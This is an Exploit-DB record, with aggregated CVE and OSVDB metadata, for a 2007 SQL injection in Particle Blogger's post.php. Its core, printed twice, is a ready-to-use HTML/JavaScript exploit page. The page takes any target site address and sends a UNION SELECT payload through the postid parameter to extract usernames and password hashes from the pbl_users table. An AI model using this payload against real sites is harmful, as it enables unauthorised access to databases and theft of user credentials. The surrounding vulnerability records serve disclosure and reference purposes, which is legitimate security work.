ID EDB-ID:3500
Type exploitdb
Reporter WiLdBoY
Modified 2007-03-16T00:00:00
Description
Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform
<!--
Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit
Type :
SQL Injection
Release Date :
{2007-03-16}
Product / Vendor :
Particle Soft
http://blogger.particlesoft.net/
Bug :
http://localhost/script/post.php?postid=-SQL Inj-
Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :
-->
<title>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</title>
<body bgcolor="#000000">
<script language="JavaScript">
function ps() {
{
unique.action=""+document.unique.site.value+"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*";
unique.submit();
}
}
</script>
<center><font face="Verdana" size="2" color="#FF0000"><b>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</b></font></center>
<form name="unique" method="POST" onsubmit="ps();">
<center><font face="Arial" size="2" color="#00FF00">Site Address :</td></center><br>
<center><input type="text" name="site" value="http://localhost/script" size="44" class="unique" class="inputbox"></center><br>
<center><input type="submit" value="Apply" class="unique"></center><br>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>
<!--
Tested :
Particle Blogger 1.1.2
Vulnerable :
Particle Blogger 1.2.0
Particle Blogger 1.1.2
Particle Blogger 1.1.1
Particle Blogger 1.1.0
Particle Blogger 1.0.0
Author :
UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org
-->
# milw0rm.com [2007-03-16]
{"id": "EDB-ID:3500", "hash": "da8ea88f9b7ec5ca4a2c38b29c901f11", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Particle Blogger <= 1.2.0 post.php postid Remote SQL Injection Exploit", "description": "Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform", "published": "2007-03-16T00:00:00", "modified": "2007-03-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3500/", "reporter": "WiLdBoY", "references": [], "cvelist": ["CVE-2007-1510"], "lastseen": "2016-01-31T18:37:57", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1510"]}, {"type": "osvdb", "idList": ["OSVDB:34305"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7414"]}], "modified": "2016-01-31T18:37:57"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3500/", "sourceData": "<!--\n\nParticle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit\n\nType :\n\nSQL Injection\n\nRelease Date :\n\n{2007-03-16}\n\nProduct / Vendor :\n\nParticle Soft\n\nhttp://blogger.particlesoft.net/\n\nBug :\n\nhttp://localhost/script/post.php?postid=-SQL Inj-\n\nParticle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :\n\n-->\n\n<title>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</title>\n<body bgcolor=\"#000000\">\n<script language=\"JavaScript\">\nfunction ps() {\n {\n unique.action=\"\"+document.unique.site.value+\"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*\";\n unique.submit();\n }\n}\n</script>\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</b></font></center>\n<form name=\"unique\" method=\"POST\" onsubmit=\"ps();\">\n<center><font face=\"Arial\" size=\"2\" color=\"#00FF00\">Site Address :</td></center><br>\n<center><input type=\"text\" name=\"site\" value=\"http://localhost/script\" size=\"44\" class=\"unique\" class=\"inputbox\"></center><br>\n<center><input type=\"submit\" value=\"Apply\" class=\"unique\"></center><br>\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE-Key{UniquE-Cracker}</b></font>\n<br>\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE@UniquE-Key.ORG</b></font>\n<br>\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>http://UniquE-Key.ORG</b></font></center>\n\n<!--\n\nTested :\n\nParticle Blogger 1.1.2\n\nVulnerable :\n\nParticle Blogger 1.2.0\n\nParticle Blogger 1.1.2\n\nParticle Blogger 1.1.1\n\nParticle Blogger 1.1.0\n\nParticle Blogger 1.0.0\n\nAuthor :\n\nUniquE-Key{UniquE-Cracker}\nUniquE(at)UniquE-Key.Org\nhttp://www.UniquE-Key.Org\n\n-->\n\n# milw0rm.com [2007-03-16]\n", "osvdbidlist": ["34305"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in post.php in Particle Blogger 1.0.0 through 1.2.0 allows remote attackers to execute arbitrary SQL commands via the postid parameter.", "modified": "2018-10-16T12:38:50", "published": "2007-03-20T06:19:00", "id": "CVE-2007-1510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1510", "title": "CVE-2007-1510", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24559](https://secuniaresearch.flexerasoftware.com/advisories/24559/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0218.html\nISS X-Force ID: 33030\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3500\nFrSIRT Advisory: ADV-2007-1006\n[CVE-2007-1510](https://vulners.com/cve/CVE-2007-1510)\nBugtraq ID: 23005\n", "modified": "2007-03-16T09:04:10", "published": "2007-03-16T09:04:10", "href": "https://vulners.com/osvdb/OSVDB:34305", "id": "OSVDB:34305", "title": "Particle Blogger post.php postid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-17T00:00:00", "published": "2007-03-17T00:00:00", "id": "SECURITYVULNS:VULN:7414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7414", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}